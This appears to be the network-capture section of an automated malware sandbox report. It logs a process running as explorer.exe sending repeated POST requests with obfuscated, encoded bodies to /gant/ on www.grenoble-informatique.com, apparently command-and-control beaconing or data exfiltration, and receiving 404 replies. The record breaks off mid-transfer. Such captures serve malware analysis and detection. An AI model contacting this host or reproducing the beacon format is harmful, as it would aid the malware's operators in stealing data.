                                                                                                                  Feb 13, 2023 19:04:50.914707899 CET1260INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:04:50 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  53192.168.11.2049907217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:53.427805901 CET1262OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.grenoble-informatique.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.grenoble-informatique.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 50 77 74 69 33 4e 30 61 45 66 55 46 68 30 43 37 44 5a 67 6e 52 70 6d 6b 28 32 69 52 48 6c 30 61 6f 55 51 49 76 6c 6a 69 68 74 56 4c 46 55 52 70 54 5a 6f 57 47 72 4a 41 6d 61 72 44 63 50 4b 6a 7e 74 78 64 47 50 49 76 36 65 70 38 79 32 56 6c 61 76 49 5f 44 48 42 58 6c 37 46 46 64 73 7e 42 53 73 32 6c 7a 35 4a 57 71 74 73 59 43 4f 66 62 75 51 59 4a 4d 66 48 61 31 53 6d 7a 4e 45 48 57 36 36 46 74 55 45 54 73 73 6e 39 58 54 71 6b 51 68 34 77 48 52 73 6f 44 4f 72 4e 4b 70 39 4e 6e 47 65 74 65 33 78 74 78 35 62 42 41 53 52 66 4f 6f 48 65 52 4d 63 56 58 45 61 33 32 54 44 46 59 33 48 6b 55 4f 30 77 56 7e 45 37 64 64 62 61 39 42 79 71 72 66 44 4e 50 6f 64 31 55 48 42 36 35 49 47 4e 43 62 6a 58 6f 33 6a 33 4f 68 6f 53 61 77 62 64 31 36 67 68 33 38 79 4f 58 41 65 49 6e 74 57 37 30 69 4c 71 49 51 39 66 36 51 4b 6e 30 6a 66 33 4e 41 66 7a 66 62 61 79 39 52 48 71 73 42 34 36 4a 41 6d 70 35 6a 66 6a 33 74 59 36 5a 76 35 6b 32 48 34 68 76 6d 6f 35 70 6b 67 6a 58 76 79 79 32 38 47 35 6f 32 53 78 47 77 71 34 45 41 6b 50 34 4e 71 59 6b 51 42 57 68 61 46 75 6f 6f 67 69 48 64 58 39 38 70 38 66 38 78 73 58 4a 6b 56 43 48 6f 42 72 45 41 65 70 67 49 67 77 74 47 6a 50 4d 64 37 59 6b 55 46 28 45 67 76 78 44 28 4a 52 38 70 4e 6f 32 77 52 56 5a 38 67 6a 5a 66 68 54 6d 78 43 76 76 72 48 38 50 45 56 72 4b 71 5a 39 5f 37 75 37 73 54 38 76 36 4b 5a 49 61 54 58 7a 79 6d 77 55 41 49 37 65 57 65 77 33 33 38 44 56 4a 44 69 47 6d 50 48 66 38 35 6c 44 48 70 4a 58 49 59 72 6b 4b 71 44 49 35 36 73 56 43 45 41 41 42 33 65 51 64 74 56 59 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7LjXB9Ja86epPwti3N0aEfUFh0C7DZgnRpmk(2iRHl0aoUQIvljihtVLFURpTZoWGrJAmarDcPKj~txdGPIv6ep8y2VlavI_DHBXl7FFds~BSs2lz5JWqtsYCOfbuQYJMfHa1SmzNEHW66FtUETssn9XTqkQh4wHRsoDOrNKp9NnGete3xtx5bBASRfOoHeRMcVXEa32TDFY3HkUO0wV~E7ddba9ByqrfDNPod1UHB65IGNCbjXo3j3OhoSawbd16gh38yOXAeIntW70iLqIQ9f6QKn0jf3NAfzfbay9RHqsB46JAmp5jfj3tY6Zv5k2H4hvmo5pkgjXvyy28G5o2SxGwq4EAkP4NqYkQBWhaFuoogiHdX98p8f8xsXJkVCHoBrEAepgIgwtGjPMd7YkUF(EgvxD(JR8pNo2wRVZ8gjZfhTmxCvvrH8PEVrKqZ9_7u7sT8v6KZIaTXzymwUAI7eWew338DVJDiGmPHf85lDHpJXIYrkKqDI56sVCEAAB3eQdtVY.
                                                                                                                  Feb 13, 2023 19:04:53.446296930 CET1262INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:04:53 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  54192.168.11.2049908217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:55.958615065 CET1267OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.grenoble-informatique.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.grenoble-informatique.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 50 77 74 69 33 4e 30 61 45 66 55 46 68 30 43 37 44 5a 67 6e 52 70 6d 6b 28 32 69 52 48 6c 38 61 6f 6d 59 49 76 45 6a 69 75 4e 56 4c 47 55 52 6f 54 5a 70 4d 47 72 68 45 6d 61 76 35 63 4a 47 6a 35 36 31 64 46 39 51 76 78 2d 70 48 39 57 56 6e 58 50 49 72 44 48 4d 55 6c 37 41 34 64 65 65 42 54 72 79 6c 34 75 31 56 70 39 74 79 43 4f 65 4a 35 41 59 37 4d 65 7a 77 31 53 36 7a 4e 48 7a 57 38 4a 39 74 59 31 54 73 72 33 39 51 5a 4b 6c 42 32 6f 78 33 52 73 74 79 4f 72 4e 38 70 38 5a 6e 47 5a 52 65 32 77 74 2d 36 37 42 41 4e 68 66 4e 73 47 69 64 4d 63 49 45 45 61 44 32 54 46 42 59 6c 33 6b 55 49 57 55 55 36 6b 37 54 5a 62 61 75 46 79 33 6b 66 43 70 31 6f 64 52 55 47 31 53 35 4a 33 4e 43 65 43 58 6f 73 6a 33 4d 38 34 53 4e 70 72 63 32 36 67 78 4e 38 78 48 71 41 5a 59 6e 73 33 62 30 6b 71 71 4c 55 64 65 78 66 71 6e 68 6e 65 4c 42 41 66 69 47 62 61 79 54 52 47 75 73 42 4c 69 4a 42 6e 70 32 6a 50 6a 4f 35 6f 36 41 6c 5a 6f 47 48 34 74 6e 6d 6f 41 32 6b 6a 50 58 7e 69 79 32 34 58 35 70 7e 69 78 4c 28 4b 35 4a 50 45 50 6a 4e 71 55 65 51 41 44 57 61 32 71 6f 36 67 79 48 66 33 39 39 34 73 66 77 6b 63 58 31 67 56 43 48 6f 47 6a 51 41 65 6c 67 49 31 30 74 47 56 28 4d 59 6f 67 6b 48 56 28 43 67 76 78 6f 28 4a 74 50 70 4d 39 58 77 56 52 6a 38 6b 48 5a 59 77 44 6d 79 41 48 75 68 58 38 57 53 6c 72 5a 33 70 78 57 37 75 33 30 54 38 28 41 4e 70 6b 61 53 58 6a 79 33 67 55 48 44 37 65 52 5a 77 33 66 32 54 4a 72 44 69 71 63 50 48 72 73 35 6e 54 48 72 5f 53 4d 43 37 73 49 30 67 67 46 31 72 78 55 45 54 52 4e 79 63 45 72 79 77 45 65 62 37 35 57 63 6a 75 43 70 43 49 63 33 6a 4c 74 71 5a 48 51 74 67 74 67 67 6c 47 43 42 2d 44 61 62 77 6a 69 7a 51 4a 67 70 41 5a 65 54 53 33 4c 76 71 56 47 4e 42 73 67 65 5a 4a 5a 4e 53 34 73 4f 7a 79 2d 58 76 7a 36 75 61 45 33 4b 78 57 70 57 38 69 59 74 73 44 38 6e 5f 77 73 64 53 66 6e 50 65 43 54 6d 42 58 79 6e 74 62 7a 44 76 62 47 51 4e 62 32 31 47 51 56 44 61 6b 59 4c 6d 62 6a 62 62 38 47 34 56 4e 41 67 50 4a 62 56 65 59 6c 44 67 51 54 74 47 55 51 79 4d 74 61 7e 5f 4c 32 73 72 64 75 57 52 46 6e 73 53 7a 71 5a 57 46 69 4c 61 39 38 32 70 76 57 52 6a 38 4e 7a 42 4d 37 48 75 33 75 35 79 42 76 41 62 6b 4c 66 61 50 44 41 33 4d 4a 33 51 35 5f 74 74 74 7a 76 66 52 34 73 6a 58 52 62 65 4a 6a 64 4c 43 5a 4f 45 42 57 4f 75 31 30 78 32 41 75 33 42 38 32 7e 6f 72 70 4f 65 6d 4b 50 4b 62 38 54 6b 52 5f 66 6f 49 4b 50 35 30 62 49 75 69 64 38 53 42 51 4e 67 4c 5a 7a 79 54 45 4d 4f 4a 61 75 45 42 35 7a 42 51 4e 79 4e 4b 54 6d 56 56 4e 33 6c 51 6a 4c 66 71 4f 77 41 37 74 31 57 6d 56 41 68 6e 6d 6c 38 39 7a 45 45 44 44 71 6b 66 30 31 30 30 47 59 36 61 45 38 76 78 6d 30 62 44 36 76 39 44 42 65 57 66 38 48 59 65 31 63 6a 56 75 75 4d 65 49 6a 5f 37 37 55 5a 59 53 36 2d 55 78 6a 44 4f 6b 74 45 41 63 4d 76 36 38 53 6a 64 37 68 68 41 61 68 61 6c 59 55 45 6b 34 48 2d 4f 33 64 37 56 58 43 5f 38 55 30 68 58 34 45 4c 63 32 70 71 36 7a 49 70 52 73 44 43 54 32 76 4b 70 77 62 43 35 47 63 4f 58 35 75 4f 51 55 78 6b 49 77 4f 30 75 65 71 7a 38 54 6d 6b 44 4e 4d 5f 43 43 53 5a 70 55 75 53 73 75 43 37 59 72 33 64 54 53 54 6c 7a 45 34 38 4a 7a 38 78 53 34 28 53 4b 56 69 48 28 55 64 78 6f 73 57 6a 43 42 55 4b 4d 6c 6e 79 32 46 47 76 54 59 32 53 5a 75 7e 62 73 30 73 6d 48 66 67 50 41 32 6a 41 4f 39 5a 6c 46 39 4c 63 65 55 32 61 44 6b 4a 68 76 62 37 74 69 41 6f 34 64 68 74 4b 48 45 67 36 6e 78 32 53 28 42 73 6e 6b 7a 55 37 77 68 48 57 32 38 54 52 4e 62 6d 56 38 43 64 4a 54 6f 57 6c 5a 58 37 77 43 2d 56 52 33 5a 46 58 34 42 74 39 7a 54 42 58 35 75 67 79 61 6e 61 5f 77 54 6d 38 44 75 74 5a 4b 47 5a 6c 4a 61 57 74 5a 77 72 67 30 52 6b 38 41 69 36 65 79 43 70 5f 39 53 6d 76 7e 67 34 48 71 6e 69 6b 68 37 6e 67 48 2d 6e 2d 39 72 48 4f 61 54 42 6f 67 61 58 51 56 4d 4e 70 45 72 77 49 63 35 52 58 46 4c 48 58 53 43 72 59 66 61 4f 51 4e 74 37 34 69 71 67 2d 79 68 36 47 7a 56 50 35 30 33 66 61 6a 43 6f 38 36 54 42 31 52 67 71 4e 73 78 47 2d 4c 6f 68 5f 57 44 33 4d 57 4f 65 57 6b 45 53 54 55 70 67 45 44 6d 4e 79 38 43 64 54 59 6d 28 31 61 6d 61 79 4f 54 70 37 6e 57 31 71 41 61 50 65 51 31 54 7a 39 59 44 66 64 53
                                                                                                                  Data Ascii: j-Jh9P=7LjXB9Ja86epPwti3N0aEfUFh0C7DZgnRpmk(2iRHl8aomYIvEjiuNVLGURoTZpMGrhEmav5cJGj561dF9Qvx-pH9WVnXPIrDHMUl7A4deeBTryl4u1Vp9tyCOeJ5AY7Mezw1S6zNHzW8J9tY1Tsr39QZKlB2ox3RstyOrN8p8ZnGZRe2wt-67BANhfNsGidMcIEEaD2TFBYl3kUIWUU6k7TZbauFy3kfCp1odRUG1S5J3NCeCXosj3M84SNprc26gxN8xHqAZYns3b0kqqLUdexfqnhneLBAfiGbayTRGusBLiJBnp2jPjO5o6AlZoGH4tnmoA2kjPX~iy24X5p~ixL(K5JPEPjNqUeQADWa2qo6gyHf3994sfwkcX1gVCHoGjQAelgI10tGV(MYogkHV(Cgvxo(JtPpM9XwVRj8kHZYwDmyAHuhX8WSlrZ3pxW7u30T8(ANpkaSXjy3gUHD7eRZw3f2TJrDiqcPHrs5nTHr_SMC7sI0ggF1rxUETRNycErywEeb75WcjuCpCIc3jLtqZHQtgtgglGCB-DabwjizQJgpAZeTS3LvqVGNBsgeZJZNS4sOzy-Xvz6uaE3KxWpW8iYtsD8n_wsdSfnPeCTmBXyntbzDvbGQNb21GQVDakYLmbjbb8G4VNAgPJbVeYlDgQTtGUQyMta~_L2srduWRFnsSzqZWFiLa982pvWRj8NzBM7Hu3u5yBvAbkLfaPDA3MJ3Q5_tttzvfR4sjXRbeJjdLCZOEBWOu10x2Au3B82~orpOemKPKb8TkR_foIKP50bIuid8SBQNgLZzyTEMOJauEB5zBQNyNKTmVVN3lQjLfqOwA7t1WmVAhnml89zEEDDqkf0100GY6aE8vxm0bD6v9DBeWf8HYe1cjVuuMeIj_77UZYS6-UxjDOktEAcMv68Sjd7hhAahalYUEk4H-O3d7VXC_8U0hX4ELc2pq6zIpRsDCT2vKpwbC5GcOX5uOQUxkIwO0ueqz8TmkDNM_CCSZpUuSsuC7Yr3dTSTlzE48Jz8xS4(SKViH(UdxosWjCBUKMlny2FGvTY2SZu~bs0smHfgPA2jAO9ZlF9LceU2aDkJhvb7tiAo4dhtKHEg6nx2S(BsnkzU7whHW28TRNbmV8CdJToWlZX7wC-VR3ZFX4Bt9zTBX5ugyana_wTm8DutZKGZlJaWtZwrg0Rk8Ai6eyCp_9Smv~g4Hqnikh7ngH-n-9rHOaTBogaXQVMNpErwIc5RXFLHXSCrYfaOQNt74iqg-yh6GzVP503fajCo86TB1RgqNsxG-Loh_WD3MWOeWkESTUpgEDmNy8CdTYm(1amayOTp7nW1qAaPeQ1Tz9YDfdSzhAtpMcJ7Ba2SLd5qW6_dDdSkmQ3cEXzyHd74FGjm7sj39hfBmrqnoWR3f6qsABzY9K5X7zhgufoFn72HRn8lDBc5JSqSOjts97pMDccJhzAbiAmOzbyXnLB9rLylHH144p_l3BrgNJWuBJnzLwMDh1Z4SxZzYkd(JC6yd0S1IlDLY0q7h59ayfcYCYwu83vgn4vz4ZgrVyd23EK8tEhnfhA0iRcoa(I9r3dLMJd(669aPzufnQJYLyvUR0eodsoQKWAqJQy1id5JNqV5ej8q9owPD0AIMSU1YpXPgt9VxU8RCALyPp0IUOZCXHqgJ0Jqxtzgb(8AwMl66rXbDRF4QwU0j7hIOf2idc1lzucR0ubmcHIlyy6rcVXYa8pe3ouFGhcYtf3QWuTeXecmTNEItmyRCszbtbnElmgMLjPaL7Q0yLdbJcH0XBbek2ZleXaYYk3jCEDaQ~GoU1jb6Y6GNHUtdHYvpm4mb4BiWAP49YbEMapCFDm22cr4_5QxFn6A-Vy79JAAHe9aNlmrCst5xjlVWM9fcDtG9TTiohwGbPl9SqYOYmNLkWNcKebTrwP9ldwv49E7XtcQiURdu~UFzF_9QdQiOSz6m14mPj9n_FV7a~GRkNNBht9VrxiIQcd(b7hsKStm2UTNxEk4q9yQWLfnLF1UJwz63RdLMBhmgYxTkCdpzzwfUopN-8585hRpWJ-BGQ1GWGm9MrZ15qX(jAWDExefccKdyjODv9PM9UplaaRPIFtM-511Qc50JvjZZSkrWQpRBLYakbqAM(bCWGXEhT5F9yiX3Pssm8WSCI-qxugWfNUvcVXYC0qBMOmumNv(aJqeiKOmSdKsEp_xACJ4mZTiuHcu1FUnQjqoZDmKLIimnX7Rrz5Y_zDmJuqftUdj6bJqAvuc4hh(EtCoDpehtuszjP_IMYKWLPtTstBAh~quJvDxGv2Tz0ppmhfdOrc0n93CJPGLonA0O2Japjl87TkG6eKhZBs(92jYJt_RW4Xp5(ufWgi6i(XcanIqAlYgElfmvb6cJiyzrvsPyAJtNeAyPqs6TUXpzUitPL57CJMCVlNWnvJUbr4vX0fE9GKFP9Sr5njXkZD5zlubuRCsD1CelK80hhrohBAJ_uLII2QZmEd9fpWj6AlL5g5QW8HB3bu~WKMOhWbVRjSwVenp_LB9SK9qjVKa2jKKKjVIE3sYK0jhKlNsPgGwbG6YNQfa_do4MJLU6qLsjtfpYT22CrxUSXY2UxIG8tjjLajzCheEW5KdlQqpF0F6tT8CIa-Ismy37XQZx4ZzEC5pTWkMbaLLXyjNXy_UZtQoSE0CWFlJz6RP2zvZrdkjJc6GJPXhQf_ItmzhF0SdUiuOHBj3yNiloRioyU9Vgvlvaw87BMiWgazBELWRX2KieoKMoLTs3F7jt0yTJBS~rzi4UBXFpPozdMm(mHQFeJ3uUIyhLgsQLeV(V2P7buHZT0TJOnBwACbs-Fvd33zrJDr5wBMXO2MvRr5rOtu3HEo3GtNRH7hmGq6D1glQ74mQsCTclR2ebeW54x5NAfwFyoFYldahjzYTaDjN5lz~323m9QBeeTTVPh4TwN3roNb0Tykakeo3XaIFm8ylKSY7E6PRAgmg4I62_XyEl(hA17S1JHcy17MZ8fPNoB6fr~JQ1ZwV-0RHmVPkREPMeCCg7oLXGtJRcAjePcuJRNhaDVBHsmSmN6XmqJ5agxR0-pLsG8WWBvskH65iNwH7NWgRTVQe4Tj4yrIMqUtpflibgG_xYkBUSnVdSBgmyUP2xvB5h4c2Zwss8G339EdH1R2O5JG~p3MLuBJs41HuKpCPRX0zDY3kNh73OPFyJww0u2S8vYUnMSsYQKXk_eZQrNxqJT1lmVnDvwmaVmN6NCkWtzDCwA6WaVD9P6nf4j7JtDN9xN57-fLB-rTSfG7It13M8FiPknT~62Fq3SIQYIAdliUzZAENjk86MOyK956NQMsUpFuZtg5Q8dP4xJ_kZB1zDRLr259M5cN8jpC161DPBKJh2Y_k_cXBvpv0U7wJYW0Sabb4LeTwqugNDeb0B
                                                                                                                  Feb 13, 2023 19:04:55.958724022 CET1275OUTData Raw: 7a 6e 46 71 6e 31 51 44 70 56 52 4b 38 6c 35 73 7a 75 6e 79 45 44 32 71 37 4d 7a 61 51 45 75 49 46 51 4d 31 73 61 76 41 4e 76 47 55 74 55 5a 68 75 39 78 46 66 73 30 47 59 2d 68 6e 47 4f 63 71 59 50 65 33 55 78 4f 59 42 64 4a 7a 46 39 6b 51 42 4f
                                                                                                                  Data Ascii: znFqn1QDpVRK8l5szunyED2q7MzaQEuIFQM1savANvGUtUZhu9xFfs0GY-hnGOcqYPe3UxOYBdJzF9kQBOhuo1BS~XktAgJMF02Ibq32GrhinS50GcdJUdW4xxrXShG14sAqTFZ2pOlTi5z4(tAxWdbGssdIf9e53yabjmzT88eN(D~UTwKJpdkRwD3mftOj4aY39jUXf2NztBmUIJEqlYwt7fzO6cRISBbCyGMzRLBqSTwDd89
                                                                                                                  Feb 13, 2023 19:04:55.972217083 CET1278OUTData Raw: 38 5a 61 4e 30 44 69 4c 49 67 43 6b 4b 5a 76 64 42 71 79 7a 72 31 50 7a 71 54 70 72 66 6c 4e 62 6f 5f 52 6c 48 54 64 2d 43 38 76 53 43 41 46 6f 55 68 78 4f 44 4a 5a 6b 28 67 56 38 4e 32 28 58 51 74 46 74 78 73 65 34 6c 65 6e 30 38 2d 61 43 54 6e
                                                                                                                  Data Ascii: 8ZaN0DiLIgCkKZvdBqyzr1PzqTprflNbo_RlHTd-C8vSCAFoUhxODJZk(gV8N2(XQtFtxse4len08-aCTnO4CikTSWKS0WXw2HXvXYgJDlBxUHvYQJOmJF5Zq3aCPNCe7JOtYF8ArgnylfAL4FaZn8bT2PWY0pn-fXB2JaQhF7NTX69mXQZMrxFGwEd7AVaBkucEk58LS24NBn(HKQw_8I43a9qt8sMp4Yg1CnzlO41u5J0jeBE
                                                                                                                  Feb 13, 2023 19:04:55.972418070 CET1287OUTData Raw: 34 69 72 7a 48 66 33 36 75 72 34 76 71 76 49 55 37 7a 4e 55 6b 43 66 77 78 69 41 71 6b 42 53 34 58 66 37 69 68 43 39 6f 4c 71 55 41 50 65 74 65 35 69 7e 42 48 43 4c 6a 75 43 4c 73 48 45 42 70 43 2d 4a 6d 57 6b 45 38 6b 79 61 4c 62 6b 6e 4d 66 41
                                                                                                                  Data Ascii: 4irzHf36ur4vqvIU7zNUkCfwxiAqkBS4Xf7ihC9oLqUAPete5i~BHCLjuCLsHEBpC-JmWkE8kyaLbknMfA6dDLwvjIl4HhtEcfwW0xJhBhFWknv5hRtEZ_qfmX5RUaN6uWZOwU3j1jtgldtkJrB8LCSjYN6oq3GJkju0VzfF3bWZNJp8ZW5wLWDAzfczyUfzjBwGFrtnUKiJmkvZqTma9ltHWMDF3xR2s-5k7NUJuPNpqtXn5ZC
                                                                                                                  Feb 13, 2023 19:04:55.972531080 CET1291OUTData Raw: 68 54 4b 76 63 65 78 45 41 4e 62 76 6e 36 64 36 4d 78 79 59 35 2d 4b 32 41 61 63 42 39 34 6f 33 76 6c 76 78 72 4a 32 57 48 53 37 78 55 43 6f 33 68 69 34 36 56 4a 4e 70 6a 70 49 69 58 58 58 44 6a 32 6e 36 73 69 4a 59 50 62 66 48 7a 49 4d 51 55 69
                                                                                                                  Data Ascii: hTKvcexEANbvn6d6MxyY5-K2AacB94o3vlvxrJ2WHS7xUCo3hi46VJNpjpIiXXXDj2n6siJYPbfHzIMQUi~_npDe1Ks05gzePFkDNMqJ44hnMeVDDIdft3wD7mJ6PxVeb-F1hP6yWV6OUL8G4klYwal5fmKQYbLjjHijNiQPVek2O1n7x_NlQNLZ0XgDFKdX~iR7zggEKEs5tDSKt_ajQsL17uKK4P7mWmj12R1Lw8LuPYtlVN6
                                                                                                                  Feb 13, 2023 19:04:55.972743988 CET1296OUTData Raw: 63 7a 58 75 69 4f 4a 78 59 48 53 56 70 56 6d 36 45 69 43 6e 67 4b 4f 7a 6f 73 42 63 36 42 55 53 63 75 42 5f 76 67 33 58 73 66 38 59 79 41 56 30 6f 49 6d 66 33 56 43 44 35 71 6c 33 5a 6b 47 42 4f 72 67 62 69 71 6d 38 67 33 57 54 30 50 68 32 78 54
                                                                                                                  Data Ascii: czXuiOJxYHSVpVm6EiCngKOzosBc6BUScuB_vg3Xsf8YyAV0oImf3VCD5ql3ZkGBOrgbiqm8g3WT0Ph2xTEkND8V~T21oUkGkzdRAiWnbUQCwlKKQwBqun5RdmIjq7Uqf3keeWqahNgkykaGKGSD9hB9szwGN5kiFuTH3IXJN5YjYJNKC4d31o0gUCItKNJP2fF6sko38hzgIOW_~LXo5EzU6CeHyYSmJopojUMj1g~z6QYHv8~
                                                                                                                  Feb 13, 2023 19:04:55.972925901 CET1301OUTData Raw: 76 35 63 5f 42 4f 6e 64 6a 76 52 45 38 61 52 37 39 52 48 46 50 4f 52 39 53 53 55 79 5a 44 65 7a 36 4b 51 35 6a 44 35 59 58 34 50 42 66 57 69 72 59 76 4b 31 70 39 28 74 6b 45 33 63 47 44 77 34 68 68 62 50 53 4a 45 35 62 61 50 6c 53 6e 79 36 46 63
